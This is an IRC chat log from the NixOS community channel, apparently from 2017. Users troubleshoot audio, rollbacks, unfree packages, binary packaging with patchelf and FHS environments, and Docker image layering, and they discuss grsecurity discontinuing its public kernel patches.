<NixOS_GitHub> nixpkgs/master 7deb425 David McFarland: nixos: use pkgsi686Linux for pkgs_i686 (#24772)
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<niksnut> shlevy: it works when I set NIX_REMOTE=daemon?max-connections=2
<shlevy> OK
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<shlevy> But hanging is clearly not the right behavior...
<Filystyn> how can i check exactly my audio card?
<shlevy> Anyway that makes my fix easier
<shlevy> For 1.12 at least
<shlevy> 1.11 is still fun :D
<Filystyn> wrong queston i know it but i am nto sure
<Filystyn> what does the configuratuion file expects me to put it
<Filystyn> in*
<Filystyn> 00:1f.3 Audio device: Intel Corporation Sunrise Point-H HD Audio (rev 31)
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<joachifm> copumpkin: anyway, unless somebody reputable steps up to maintain the community variant, I suppose the responsible thing is to discontinue the grsec nixos module.
<copumpkin> Yup I guess we'll see how things play out
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<copumpkin> We could I guess replace with the KSPP stuff
<Filystyn> what do i put here options snd slots=snd-hda-intel
<Filystyn> hm?
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<joachifm> copumpkin: yes, I have a PR to enable some pax ports but it didn't garner much excitement :)
<Filystyn> hellooo.... ;-)
<Filystyn> How to set sound card...
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<joachifm> copumpkin: hopefully they'll get around to porting more of the interesting features now (RAP, UDEREF). we'll see
<goibhniu> Filystyn: you can set the default soundcard with a pulseaudio gui
<exarkun> dash: I guess it is of my own making
<Filystyn> ok
<goibhniu> Filystyn: e.g. pauvcontrol
<exarkun> dash: the set comes from buildPythonPackage. The list is from my code because I thought a list would be a good data structure to represent a bunch of contents for a docker image.
<exarkun> dash: maybe I should toss the list and just glom a bunch of sets together?
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<exarkun> but are _all_ derivations sets like {name: store path}?
<NixOS_GitHub> [nixpkgs] yuriaisaka opened pull request #25249: imagej: init at 150 (master...add-imagej) https://git.io/v9ODL
<Filystyn> mmmcant find it not working give me a sec
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<NixOS_GitHub> [nixpkgs] grahamc pushed 1 new commit to master: https://git.io/v9ODs
<NixOS_GitHub> nixpkgs/master bdd89fa Graham Christensen: Revert "openvpn service: source up/down scripts"...
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<sphalerite> gchristensen: you had a write-up on installing nixos on an XPS 15, right?
<sphalerite> found it myself :)
<exarkun> Hmhmhh. Ok so I have a Python builder now and it gets some derivations in its environment. That's a step.
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<Filystyn> back
<Filystyn> so i cant enetr that pulse audio gui
<Filystyn> also
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<Filystyn> system -upgrade seem to break
<Filystyn> on dependencies
<Filystyn> but thsi is probably not connected
<NixOS_GitHub> [nix] shlevy opened pull request #1358: Add Store nesting to fix import-from-derivation within filterSource (master...store-nesting) https://git.io/v9Oyf
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<Filystyn> again how to switch to sound card i actualy have
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<Filystyn> guys if i get a break on my nix rebuild tho i did not change anything
<goibhniu> Filystyn: did you --upgrade?
<Filystyn> I tried but now i just want to switch config and can't
<goibhniu> well, that will have pulled down a new channel
<goibhniu> you can roll that back, if you like
<Filystyn> can i do it from command?
<goibhniu> you did change the PA setting too
<Filystyn> or i need to use the start system older build
<Filystyn> rollback
<Filystyn> seem to work fine now great ok now to the alsathing..
<goibhniu> Filystyn: https://nixos.org/wiki/FAQ#I.27ve_updated_my_channel_and_something_is_broken.2C_how_can_I_rollback_to_an_earlier_channel.3F
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<Filystyn> when i rollback can i go forward with --upgrade simply? ;>
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<goibhniu> yep
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<Filystyn> thank you for help
<hodapp> wow, I was going to make a package for DraftSight but for some unknown reason the download is 525 MB O_O
<hodapp> bro, that's bigger than some Linux distros I run
<goibhniu> my pleasure!
<vasile_> I've installed nix on a debian box and I'm trying to understand how it works in practice. If I install a nix package, where do I configure it? Do I just edit /etc/foo/config as per usual? Is there a way to specify configuration as a nix expression? How do profiles and rollbacks work with that config stuff? I didn't see anything in the documentation about this, but if anybody can point me to something
<vasile_> I missed, that would be great. Thanks for any help in understanding this.
<exarkun> is // set intersection or union?
<exarkun> (and why are the docs for it ambiguous :/)
<simpson> Union.
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<exarkun> thanks
<simpson> IIRC preferring values on the left.
<sphalerite> gchristensen: how is the battery life on the XPS 15, roughly?
<simpson> exarkun: Agh, no, it's preferring values on the right.
<exarkun> not far enough along to care about that yet :)
<exarkun> is anything guaranteed about the order of the result of attrNames and attrValues?
<simpson> Sure, it's just backwards from Ruby, Monte, etc. which assume that the "correct" or "important" value is on the left and the "optional" value is on the right.
<exarkun> is `map f (attrNames s) (attrValues s)` a coherent thing to do?
<simpson> Whereas Nix has more of a "default" value on the left and an "override" value on the right.
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<simpson> Yes, although there's pkgs.lib.mapAttrs as well.
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<joachifm> copumpkin: one possibility is to instead provide a prebuilt kernel based on kspps recommended config; it could be the kernel selected by the hardened profile.
<simpson> Which is used like `mapAttrs (x: y: ...) s` IIRC.
<exarkun> oh map doesn't even take more than one list-of-arguments
* simpson is like clever but shitty
<simpson> Oh, sorry, yeah. I read your intent but forgot how unforgiving Nix is.
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<Filystyn> nix-store --gc fixed the dependencies break
<Filystyn> lol
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<nh2> my nix command is stuck at `download-from-binary-cache.pl: still waiting for ‘https://cache.nixos.org/i2wfhifadr2v1l5h7cyyk61r6hphji0w.narinfo’ after 5 seconds...` and now running some `perl` command at 100% CPU for 5 minutes, any idea what that could be?
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<Filystyn> nah it did not but still something changed any way gtg
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<nh2> strace shows it stuck in a poll() loop
<nh2> the process is: /nix/store/lkdcrriljadg5c1hdb0czhcw40kb7mdj-perl-5.22.2/bin/perl -w -I/nix/store/qdkzm17csr24snk247a1s0c47ikq5sl6-nix-1.11.6 /nix/store/qdkzm17csr24snk247a1s0c47ikq5sl6-nix-1.11.6/libexec/nix/substituters/download-from-binary-cache.pl --query
<nh2> ctrl-C and running it again seems to fix it
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<copumpkin> joachifm: that sounds reasonable, yeah. Or even use all the KSPP stuff by default? I thought they were being deliberately conservative to make it more palatable upstream
<bennofs> is there something like Nix for deploying Android phones? :D
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<joachifm> copumpkin: on-by-default would be ideal, ofc
<joachifm> copumpkin: I just find it tedious to touch core stuff like that :)
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<exarkun> mapAttrs hates me. "value is a string while a set was expected"?
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<exarkun> first argument is clearly a function. second argument is clearly a set.
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<gchristensen> sphalerite: I'm at 83%, 7hrs18min remaining
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<ozer> I can't seem to override the "blas" package argument to numpy with python35Packages.numpy.override; it just does not apply the effect
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<ozer> and I can't override it with overrideAttrs because the rest of the derivation seems to be evaluated before overriding passthru.blas
<gchristensen> sphalerite: 8hrs and some minutes when I'm not typing / doing anything.
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<sphalerite> gchristensen: I ordered one :o
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<ozer> gchristensen: tshirt?
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<gchristensen> sphalerite: nice.
<gchristensen> ozer: eh?
<ozer> nevermind
<gchristensen> ok
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<nix-ediot> hello nix experts gain, i tried putting this line in my configuration.nix, hardware.pulseaudio.enable = true; and I am getting sound icons now. thank you but problem is when i press Volume button, sound is not going up, any insights, rememba am very new to NixOS
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<gchristensen> nix-ediot: do you know how you would make that work on other linuxes?
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<NixOS_GitHub> [nix] shlevy opened pull request #1359: Add StoreAPI nesting to fix import-from-derivation within filterSource. (1.11-maintenance...store-nesting-1.11) https://git.io/v9ONn
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<nix-ediot> <gchristensen> i tried linux command, pactl set-sink-volume 0 +5dB get error Connection failure: Connection refused pa_context_connect() failed: Connection refused
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<sphalerite> nix-ediot: try logging out and in again
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<sphalerite> unless you've already done so after enabling the setting and running nixos-rebuild switch
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<nix-ediot> thank you sphalerite, will do both and with -rebuild boot
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<anton____> Hi, could somebody help me? I am trying to package lightworks (propietary video editor) from debian packages and am having problems with patching the rpath using patchelf. Many libs e.g. gtk3 are not found although they are certanly there. Here is my file if you want to have a look: https://pastebin.com/fFP15r7A
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<steveeJ> when I run two consecutive nix-instantiates with different attributes but provide the same indirect root path there is no symlink change in /nix/var/nix/gcroots/auto/
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<thineye> Hi, anybody knows how I can check in a package build recipe if the grsecurity kernel is used?
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<sphalerite> steveeJ: yes, if the output symlink is the same the gc root doesn't need to change
<steveeJ> I'm not sure if this is expected or not. It might just be the path that's hashed
<joachifm> thineye: what are you trying to do?
<sphalerite> steveeJ: as the result symlink is updated, the gc root points to the new place correctly
<steveeJ> sphalerite: gotcha, I wanted to reassure myself that I'm not missing something. this also means that the old derivation will be GC'ed on next run, correct?
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<thineye> joachifm: I got proprietary nvidia with grsecurity kernel building and running and now I want to do my first PR but I need to do the changes more generally for the community. So I want to check in the nvidia package build recipe if the grsecurity kernel is used and if so apply the pax patch from gentoo
<maikklein> Can anyone run 'nix-env -qaP | grep teamspeak_client' and tell me if it actually find something?
<gchristensen> ~.
<maikklein> At this point I almost think that there is a bug with nixpkgs
<joachifm> thineye: you can check for the features.grsecurity attribute on the kernel drv
<makefu> maikklein: can you see any packages when you run `nix-env -qaP` ?
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<maikklein> makefu: yeah many
<joachifm> thineye: as in patches = optional (features.grsecurity or false) myPatch &c
<gchristensen> maikklein: the problem is you probably haven't enabled unfree packages for your user
<makefu> ^ shiet, yes this might be true
<joachifm> thineye: err, that should be kernel.features.grsecurity or something, but you get the idea
<thineye> joachifm: thanks, I will try / search for it :)
<gchristensen> maikklein: run nix-shell -p teamspeak_client and it should show you instructions on how to enable it for your user.
<maikklein> I have this on my configuration.nix nixpkgs.config.allowUnfree = true;
<maikklein> do I then also need to enable this for the user?
<gchristensen> that sets it for the nixos' install, but _not_ for your user
<maikklein> oh okay
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<gchristensen> maikklein: can you comment on this issue and describe how you thought nix was broken? https://github.com/NixOS/nixpkgs/issues/17126
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<maikklein> gchristensen: I can and I will
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<maikklein> once I have figured out some nix-config errors that just appeard
<joachifm> thineye: in case you're wondering, the 'or false' part is because most kernels won't have that attribute at all, resulting in eval error
<gchristensen> thank you, maikklein
<ixxie> gchristensen: so I guess that means one can install stuff on a user-by-user basis using config.nix in the home folder?
<joachifm> thineye: but beware that grsec might be going away soon ...
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<gchristensen> ixxie: conf.nix configures nixpkgs but does not allow declarative management of user packages
<gchristensen> joachifm: oh?
<thineye> joachifm: what do you mean with: going away soon?
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<ericnoan> oh yeah... grsec are discontinuing public patches https://grsecurity.net/passing_the_baton.php
<joachifm> thineye: 4.9 is the last supported free kernel
<gchristensen> :( :(
<NixOS_GitHub> [nix] edolstra closed pull request #1359: Add StoreAPI nesting to fix import-from-derivation within filterSource. (1.11-maintenance...store-nesting-1.11) https://git.io/v9ONn
<ixxie> gchristensen: makes sense, last time I was asking there was no solution for declarative user configuration mgt
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<maikklein> When I do 'sudo nixos-rebuild switch' I now get the following error 'error: file ‘nixos-config’ was not found in the Nix search path (add it using $NIX_PATH or -I), at /nix/store/qr7d2qh11jwwcq291azif8n5qn7r1g8x-nixexprs.tar.xz/nixos/default.nix:1:60'
<maikklein> What does nixos expect me to do here?
<pikajude> maikklein: sudo doesn't preserve environment
<pikajude> unless you use sudo -E
<maikklein> oh
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<pikajude> sudo has a specific list of environment variables that it will preserve, it's in the sudoers file or something, i don't remember
<pikajude> but yeah, if you have a NIX_PATH set it won't carry over without -E
<pikajude> it's for security reasons :')
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<maikklein> okay thanks
<ericnoan> gchristensen: did you read that grsec post?
<gchristensen> hrm I don't have that problem with sudo
<gchristensen> ericnoan: not yet, at a conf, will read later
<pikajude> you probably have NIX_PATH set somewhere where it's picked up globally
<pikajude> pretty sure if it's in environment.variables sudo will see it
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<maikklein> Can I set allowUnfree for a user directly inside my configuration.nix?
<maikklein> Or do I have to put it in '~/.config/nixpkgs/config.nix'
<thineye> joachifm: wow. so hopefully there will be a solution until eol of 4.9 in january 2019
<sboosali> hey, how do i install JS build tools (like bower, gulp or grunt)?
<sboosali> nox finds nothing, the manual doesn't say, the nodePackages attribute doesn't put in on the path (it's the library, not the exe?), and `bin-bower` etc from an old blog post seem gone.
<sboosali> (i'm pretty new to js stuff)
<gchristensen> pikajude: I haven't done anything special to nixos, but maybe so
<gchristensen> maikklein: you have to set it per user, no way to enable globally.
<pikajude> well, if you set nix.nixPath sudo sees it
<pikajude> it depends
<gchristensen> ah, like I saiid, I haven't changed anything in there
<maikklein> gchristensen: I thought that I maybe could put in here 'users.extraUsers.maik = { .. }'
<pikajude> ok
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<pikajude> who knows then
<pikajude> do you have your configuration file in the default location
<gchristensen> maikklein: no
<gchristensen> I do, pikajude
<joachifm> thineye: usually, testing patches have not been carried through a kernel's eol; I'm not seeing anything about that in the latest announcement, so I read that as support stopping immediately
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<pikajude> that'll do it then
<gchristensen> ah :)
<pikajude> my nixos config file is in ~/.nixos
<pikajude> because i hate having to edit it with sudo
<gchristensen> fair, me too
<hyper_ch> well, I have mine in /etc/nixos/configuration.nix
<hyper_ch> and just chowned it to my default user
<pikajude> but that feels wrong
<pikajude> morally
<hyper_ch> now some people in here probably tear out their hair
<hyper_ch> single-user system... just me and root :)
<pikajude> see, i tried to just use root
<pikajude> but chrome doesn't like that :(
<joachifm> thineye: granted, the wording is a little vague on that point
<benley> anyone mind taking a quick look at this pr for me? (it's just an alertmanager version bump)
<NixOS_GitHub> [nix] edolstra pushed 2 new commits to master: https://git.io/v93eg
<NixOS_GitHub> nix/master 4bc0076 Shea Levy: Add Store nesting to fix import-from-derivation within filterSource
<NixOS_GitHub> nix/master 39b08f4 Eelco Dolstra: Merge pull request #1358 from shlevy/store-nesting...
<MichaelRaskin> How interesting… ThinkPad, Optimus done wrong, you need Nvidia GPU to access the VGA output. After some update partial window repainting got a lot of glitches. Why in the world the simplest possible solution (and I know of no other working solution, short of fully switching off Nvidia via BIOS) is running a compositing manager??
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<turnandrun> hello
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<exarkun> How does nix feel about links between derivations in the store?
<disasm> I'm stuck... How do I configure wpa_supplicant for wpa2 enterprise connections?
<MichaelRaskin> (or clarify the question)
<MichaelRaskin> disasm: this is almost from a real config (it is, but irrelevant details like domain and password are changed)
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<sphalerite> Mic92: what's wrong with running a compositor?
<sphalerite> sorry I meant MichaelRaskin
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<thineye> Is there a way to gain access to "config" inside a nix pkg build recipe?
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<maikklein> How do I disable mouse accel? "xinput --set-prop 10 'Device Accel Profile' -1" works for me but "services.xserver.libinput.accelProfile = "flat";" doesn't seem to do aynthing.
<dash> thineye: the nixos whole-system config? no, because there might not be one
<dash> thineye: what do you want to do? there's probably a good way.
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<exarkun> is there an api to get the closure of a derivation?
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<thineye> dash: I wanted to check if the nvidia driver is used and if so, then add some kernel config
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<dash> thineye: hm... you're doing this in configuration.nix?
<thineye> dash: for the nvidia driver, I set it in configuration.nix
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<exarkun> should I just manually read and interpret `nix-support/propagated-native-build-inputs` ?
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<joachifm> exarkun: from within Nix?
<exarkun> in an expression I'm writing, yes
<joachifm> exarkun: there's exportReferencesGraph
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<exarkun> Great, that looks promising, I'll play with it. Thanks.
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<thineye> dash: I can do it with packageOverride. But I thought, there is prehabs a more elegant way
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<dash> thineye: which package?
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<thineye> dash: linux_grsec_nixos - inside this pkg I want to check if nvidia is set. But this check seems not to be possible because I need the config. So at the moment I implement a check in the config of grsecurity and do a package override on linux_grsec_nixos
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<sphalerite> MichaelRaskin: what's wrong with running a compositor?
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<MichaelRaskin> I mean, _having_ to run compositor so that a terminal emulator that works perfectly on the laptop screen stops glitching on the external monitor is somewhat wrong.
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<MichaelRaskin> sphalerite: also, it sets purplish desktop background instead of my solid-color xsetroot-set one!
<MichaelRaskin> (which is greenish)
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<sphalerite> I don't know, I think it does make sense that when the graphics cards are talking to each other the.. stuff.. talking... compositor... I don't really know what I'm talking about :D
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<MichaelRaskin> Well, before the update everything worked fine without compositor
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<disasm> MichaelRaskin: I was trying to do it from networking.wireless.networks but looking at nixpkgs it doesn't look like it supports it. I guess I'll just run wpa_supplicant manually.
<MichaelRaskin> Well, NixOS module supports maintaining wpa_supplicant.conf manually but using the service
<MichaelRaskin> Also, you can always use improper escaping
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<MichaelRaskin> I.e. set ssid to be a string with "and a linebreak and whatever extra options you want (don't forget to put something making use of the stray " in the end)
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<NixOS_GitHub> [nixpkgs] k0001 opened pull request #25250: fetchdarcs: add SSL_CERT_FILE environment variable (master) (master...ssl-darcs-master) https://git.io/v93cs
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<NixOS_GitHub> [nixpkgs] k0001 opened pull request #25251: fetchdarcs: add SSL_CERT_FILE environment variable (release-17.03...ssl-darcs-1703) https://git.io/v93cw
<exarkun> does exportReferencesGraph work with mkDerivation too? I added it but all I got was its value in the environment of my builder.
<exarkun> Oh, my mistake. I got that _and_ a file fuuuuull of wonderfulness.
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<exarkun> is the format documented anywhere? :)
<exarkun> oh hm
<sphalerite> if it's a graph, it might well be dot
<exarkun> maybe not quite what I wanted... I'd rather have this information in my nix expression, not accessible to the builder
<sphalerite> graphviz
<exarkun> I want to generate a derivation per reference, basically
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<exarkun> hmm I suppose I could make a layer per first order dependency instead of a layer per transitive dependency, wonder if that would be better or worse
<exarkun> but I guess what I was really hoping for was something like `closureOf derivation` returning a list or set of whatever's in the closure of `derivation`
<exarkun> So I could map my buildLayer over it and pass all of the results on to buildImage
<MichaelRaskin> Well, that would include static bootstrap tools
<MichaelRaskin> And all the other annoying stuff
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<exarkun> is that what "closure" means? Okay, maybe I want the set of transitive runtime dependencies then. Does that have a name?
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<sphalerite> I believe that's what the closure is
<MichaelRaskin> Well, runtime dependencies cannot be distinguished from build-time-only dependencies in the evaluation-time
<sphalerite> Over runtime dependencies, anyway
<exarkun> MichaelRaskin: Ooo
<MichaelRaskin> Usually closure is runtime closure, yes, but in this case there is the feasibility problem
<MichaelRaskin> Runtime dependencies are defined in terms of building and analyzing the result
<exarkun> Analyzing it how?
<sphalerite> The closure is a generic notion for any transitive relation. I think. I actually don't know what it is formally, but I could probably work it out. Or look it up. Anyway, I think what I'm writing here is mostly noise so I should maybe just shut up.
<MichaelRaskin> Basically, grepping the entire output package for literal matches of hashes of runtime closure of build dependencies
<copumpkin> yeah, you can take any relation and make it into a (possibly reflexive &) transitive one
<MichaelRaskin> sphalerite: I would say that the transitive closure is more interesting for non-transitive relations!
<exarkun> Okay, I think I'm starting to see the edges of the problem, at least
<copumpkin> some would call it a free category
<exarkun> Specifically, what you said about "evaluation-time" was pretty important
<copumpkin> there's a dozen different interpretations of the notion
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<sphalerite> MichaelRaskin: whoops, yes
<exarkun> A `closureOf ...` expression would have to produce an evaluation-time result and that's too early?
<exarkun> (if it were going to exclude build-only deps)
<MichaelRaskin> And then there is runtime closure which is a scope and extent (happens with creating function values inside lexical scopes) instead of the relation-closure
<MichaelRaskin> Yes
<exarkun> I guess I could deal with that by duplicating the hash-grep-post-processing, if keeping the build deps out were sufficiently important (it would be nice, not sure if it's critical here).
<joachifm> exarkun: you can reify exportReferencesGraph as a nix value via import-from-derivation ...
<exarkun> I wonder what the nixpkgs docker image builder does about this
<MichaelRaskin> image builders just take the graph and process it during the build
<sphalerite> can't that just get all the stuff built and go from there?
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<exarkun> joachifm: "the controversial import-from-derivation"? :)
<MichaelRaskin> sphalerite: well, right now a good NixPkgs test after a change is to instantiate (evaluate and write derivations for) all the packages
<MichaelRaskin> What exarkun wants would make that operation a bit more expensive than it is now
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<sphalerite> aah right
<joachifm> exarkun: not sure why exportReferencesGraph is not sufficient for your purposes; reification won't really help but it gets you a nix value at least :)
<exarkun> joachifm: I don't know if it's sufficient or not. I was hoping to leverage a lot of Nix's coolness for this builder. That means keeping responsibility for knowing about the closure in Nix, I think. Instead of doing dumb stuff in my imperative builder.
<joachifm> exarkun: what do you need to do with the closure?
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<exarkun> What I could try now is changing my layer builder to use the references graph to put N derivations onto the layer it is building (instead of 1). Then the image builder stays the same and just assembles larger layers. That could work.
<NixOS_GitHub> [nixpkgs] Profpatsch opened pull request #25252: hledger(-web): move to all-packages with static build (master...hledger-static) https://git.io/v93Rl
<exarkun> except there's probably something complicated to do with references that appear in the graph for more than one layer...
<exarkun> joachifm: I need to put it into a docker image
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<MichaelRaskin> Well, you can import something less imperative and write builder in it, if you want
<exarkun> joachifm: and the original idea was one derivation per layer
<exarkun> but I'm open to other ideas :)
<joachifm> exarkun: is "layer" a docker concept? I've no idea what that means
<simpson> joachifm: Yeah, it is. Docker does its work in a layered union filesystem, and exarkun is wanting to work with individual layers.
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<copumpkin> exarkun: why would you separate derivations into separate layers? there's not a natural ordering of them
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<dmj`> Is there a way to perform nix-build in the current directory but retain the git information
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<dmj`> like leaveDotGitFiles
<dmj`> but minus the fetchgit
<dmj`> inside the tmp dir that nix-builds are run
<exarkun> copumpkin: I'm trying to figure out if that matters or not. I have a hypothesis that it does not.
<gchristensen> ~.
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<copumpkin> exarkun: well, docker layers are ordered, and affect the sorts of things you can update efficiently. Have you played with dockerTools?
<exarkun> joachifm: yea, as simpson said. Docker is optimized for small layers.
<joachifm> exarkun: are layers inputs of one another or just superimposed?
<copumpkin> there is sort of a natural ordering for derivations, but I don't see much benefit in using it for docker
<exarkun> copumpkin: They are ordered within an image but they can be arranged in different orders for different images.
<gchristensen> exarkun: how do you figure it is optimized for small layers?
<exarkun> copumpkin: I have played with dockerTools. It's too slow.
<copumpkin> ah
<copumpkin> okay
<nix-naive> hi someone helped me earlier with my nixos rebuild. thank you, i made a nixos tshirt, http://picpaste.com/IMG_20170426_163200-0gjZproI.jpg not very pretty
<copumpkin> exarkun: so you could stratify the runtime dependencies into layers
<sphalerite> nix-naive: it's wonderful, where can I buy one?
<copumpkin> I wouldn't do one derivation per layer or you'll end up with tons of layers though
<exarkun> gchristensen: If you change one byte of a layer, you have to recreate and reload that layer and then create new images using the new layer.
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<nix-naive> made it with paintbrush sphalerite
<exarkun> gchristensen: If that layer is small, that has a small impact. If it is large, it has a large impact.
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<gchristensen> yes, but that is a problem with layers, and if you have many layers you have to recreate each subsequent layer
<exarkun> gchristensen: If you are using `docker build`, yes.
<exarkun> gchristensen: If you are writing out an image tarball yourself, no.
<gchristensen> ah
<gchristensen> not sure how docker will handle many layers sthough
<turnandrun> Hello, would anyone here know how to run an custom NPM package in a nixops deployment? I've tried npm2nix, node2nix, and nixfromnpm but none of them actualy made usable nix expression files.
<exarkun> I am also not sure.
<exarkun> I will find out, I guess.
<gchristensen> docker supports a maximum of 127 as of 2013
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<gchristensen> nice idea, I'd like to see this explored
<nix-naive> self created t-shirt, nobuy, spahlerite, someone also helped me with audio in my NixOS, alsa mixer is all that i needed, everything working fine now back to nix-shell, peace
<sphalerite> nix-naive: :p
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<copumpkin> joachifm: fwiw, most convo around grsec happens in #pax on oftc now
<copumpkin> since people are prone to being banned from #grsecurity
<gchristensen> :o
<simpson> Totally a healthy ecosystem that we should be accepting kernel patches from~
<copumpkin> :)
<dtzWill> awwww yiss speaker here is pitching various aspects of deterministic systems and talked a bit about NixOS :D
<gchristensen> where is here?
<MichaelRaskin> Well, the patches will not be published anymore anyway…
<copumpkin> yeah
<copumpkin> that's what the conversation is about
<copumpkin> what to do next
<MichaelRaskin> Wait, are you replying here to a message on #nixos-security?
<MichaelRaskin> Or is it just in the part of backlog where I was offline?
<nliadm> is there a way to declaratively create my user's nix-profile?
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<MichaelRaskin> I would not call that exactly nix-profile
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<MichaelRaskin> It is trivial to write an expression calling buildEnv and use nix-build -o
<plumps> @grahamc[m] did you happen to have a look at vulnix? https://github.com/flyingcircusio/vulnix
<MichaelRaskin> And mention it in the shell profile in the same way as nix-profile is mentioned
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<gchristensen> plumps: yeah, a bit
<plumps> so what do you think
<gchristensen> will say more later :)
<plumps> sure ^^
<plumps> if i am not here, you may drop me line as well
<plumps> lib/maintainers.nix ;-)
<nliadm> I'm using buildEnv currently, but it doesn't work the same
<gchristensen> plumps: :)
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<MichaelRaskin> nliadm: well, it is quite flexible, maybe it can be reconfigured
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<joachifm> copumpkin: cool, lurking now :)
<nliadm> yeah I guess I want like, a metapackage
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<clever> has anyone here use M.2 NVME drives before?
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<hl> How can I uninstall nano?
<simpson> hl: IIRC you can't. Why?
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<hl> simpson: because I want to.
<simpson> hl: Okay. Totally understandable desire. IIRC you can't.
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<MichaelRaskin> Well, you can, some mkForce on systemPackages could help
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<MichaelRaskin> But then this will break everything that automatically adds to systemPackages
<MichaelRaskin> Not exactly break, but it will become your responsibility to readd everything
<Dezgeg> maybe nano could be aliased to say, coreutils via packageOverrides (without recompiling almost anything)
<hl> Is there some way for me to get the effective current value of systemPackages? Just curious.
<copumpkin> nixos-option environment.systemPackages
<copumpkin> or you can use nix-repl or nix-instantiate, but nixos-option is easiest
* copumpkin <- wants to abolish environment.systemPackages altogether
<copumpkin> I think it's a wart
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<hl> oh?
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<gchristensen> copumpkin: oh?
<copumpkin> it's just a mechanism to add globals, and in doing such obscures meaningful dependencies
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<gchristensen> "just a mechanism" a very useful mechanism as a user of the systeme
<copumpkin> there's a few scripts in NixOS that will break unexpectedly if someone turns off firewall, iirc
<copumpkin> because they just assume something is in the path, because usually it is, because most people don't turn off their firewall
<copumpkin> not having random crap lying around by default is what drew me into nix in the first place
<copumpkin> and I think is part of hl's concern about nano?
<gchristensen> hmm we can break the path on those scripts
<copumpkin> combined with the inability to have "negative membership" in the module system's append mechanism, it makes me uneasy
<copumpkin> it's also just messy
<gchristensen> what do you propose instead?
<maurer> copumpkin: I think that you'd have to do a lot of work to be able to safely remove systemPackages without breaking expressivity
<copumpkin> most things that add to systemPackages don't need to
<copumpkin> just because I enable services.docker, doesn't mean I want all my users to have the docker client in scope
<MichaelRaskin> gchristensen: break down the module system as a start
<maurer> copumpkin: For example, without systemPackages, how are you going to get the terminfo for urxvt available?
<copumpkin> maurer: nixos-option or similar mechanism
<maurer> You _could_ add a special field to ssh where you give it a set of terminfo packages
<copumpkin> have it publish the value it wants to use
<copumpkin> and others consume it
<maurer> but the problem is that there's a very long list of things like this
<maurer> (Another example for me is that I need libu2f in systemPackages, because I need a custom udev script for my second factor)
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<maurer> Like, yes, try to avoid adding to systemPackages
<maurer> but it's there as a useful escape hatch
<gchristensen> I don't think you need libu2f in systemPackages for the key
<maurer> gchristensen: It didn't work when I didn't have it there and started working when I added it
<gchristensen> but inside of services.udev.packages
<copumpkin> I'm just saying, it's a crutch, and people copy and paste modules all the time and every time they'll add some useless crap mindlessly to systemPackages
<hl> hmm, why is spidermonkey still installed... nothing seems to be depending on it
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<copumpkin> and then write ExecStart scripts that refer to that instead of the explicit package
<maurer> gchristensen: Sure, services.udev.packages would probably work, didn't know that was an option
<MichaelRaskin> Well, modules system is also partially a crutch…
<copumpkin> it is, but there's degrees of brokenness :)
<MichaelRaskin> With systemPackages, I have at least a chance to keep track; with the entire module system — not really
<hl> nix-store -q --references *spidermonkey* just gives me gcc-lib, glibc, nspr
<mellowmaroon> has anyone else had problems with GDM? Rebuild fails with it
<MichaelRaskin> hl: you want referrers
<hodapp> hmmm. any suggestions for running a .deb package that doesn't want to run inside Docker due to library issues I don't feel like tracking down?
<hodapp> right now it is complaining of libX11.so.6.
<MichaelRaskin> Well, you could try following the Steam guide
<MichaelRaskin> To create a chroot intended to run, hm, a Debian package with weird dependencies and not friendly to patchelf.
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<hodapp> steam guide?
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<clever> MichaelRaskin, hl: you could also packageOverride nano to null
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<mellowmaroon> When I try to run "nixos-rebuild switch" with GDM, the service "systemd-vconsole-setup.service" fails
<clever> mellowmaroon: that happens sometimes on my systems, i just ignore it
<hodapp> MichaelRaskin: nice. buildFHSUserEnv definitely got me further.
<hodapp> now, time to play whack-a-mole with libraries.
<mellowmaroon> clever: It's ok to ignore? Does the Gnome package need to be fixed?
<clever> mellowmaroon: it also happens with xfce, so its not a gnome problem
<mellowmaroon> clever: Ah, I see
<mellowmaroon> Does anyone else use the Flat-Plat theme? I'm wondering how I can change the GDM theme
<mellowmaroon> The git (https://github.com/nana-4/Flat-Plat) gives a file to overwrite, but I'm wondering what needs to be done to make this work with NixOS
<hodapp> "This application failed to start because it could not find or load the Qt platform plugin "xcb"." "Available platform plugins are: linuxfb, minimal, offscreen, xcb."
<hodapp> well this should be fun
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<clever> hodapp: you need to set an env variable to tell it where to find qt plugins, check the skype or teamspeak clients in nixpkgs
<clever> hodapp: both of those are qt based and blob-only
<NixOS_GitHub> [nixpkgs] shlevy pushed 1 new commit to master: https://git.io/v93DR
<NixOS_GitHub> nixpkgs/master d3bf2af Renzo Carbonara: fetchdarcs: add SSL_CERT_FILE environment variable
<mellowmaroon> also, is there a way to enable Gnome Extensions with Chromium? That is, does the "enableGnomeExtensions" options work with it?
<NixOS_GitHub> [nixpkgs] shlevy closed pull request #25250: fetchdarcs: add SSL_CERT_FILE environment variable (master) (master...ssl-darcs-master) https://git.io/v93cs
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<hodapp> clever: the issue was missing dependencies in libqxcb.so, as far as I can tell, so I don't think so
<hodapp> but now stuck at "xkbcommon: ERROR: failed to add default include path /usr/share/X11/xkb" after splash screen
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<hodapp> oh, that wasn't a fatal error; the actual error is "Failed to load modules. The application will close. Please reinstall the application." at the splash screen
<hodapp> whatever the bloody fuck that means
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<hodapp> oh, okay, it was just another 1,372 dependencies that weren't visible in ldd
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<clever> hodapp: oh, i think ld.so can trace things its loading
<clever> and failures
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<hodapp> hrm?
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<clever> hodapp: LD_DEBUG=libs i think
<hodapp> Operation Library Whack-a-Mole already finished, so I'll shelve that tip for next time
<hodapp> and if there never is a next time, awesome
<hodapp> hm. I should see if they have versioned .deb files. I could make this into an actual package, I guess
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<hodapp> but the .deb file is 525 MB and probably has no version attached, so the hash will become wrong as soon as an update happens
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<hodapp> are there many Nixpkgs packages based around binary blobs whose contents change arbitrarily?
<copumpkin> no
<hodapp> I figured not, since it's a pain
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<copumpkin> what are you packaging?
<hodapp> DraftSight, a 2D CAD package
<maurer> btw, I don't have the bandwidth to handle anythign related to this at this point, but at some point someone should look into default nixos power management settings
<maurer> Just by running powertop and swapping sysctl values it suggested, I've gotten another 40% battery life
<maurer> which suggests our default values may not be great
<hodapp> maurer: I may have to look at this on my Thinkpad
<maurer> This was on a thinkpad P50
<maurer> but yeah, check the tunables suggested by powertop
<maurer> they help
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<hodapp> copumpkin: DraftSight is about the only competent 2D CAD package I'm aware of on Linux, and also the only thing that seems to load DXF files properly
<hodapp> I'd love to be wrong
<clever> maurer: some options i had turned on for either powertop or latencytop: https://gist.github.com/cleverca22/4ad4b0a1fcccf9e67b4cc4fb19b71a41
<maurer> clever: Yeah, I'm mostly just saying there's some low hanging fruit here if people want to try to improve nixos battery life
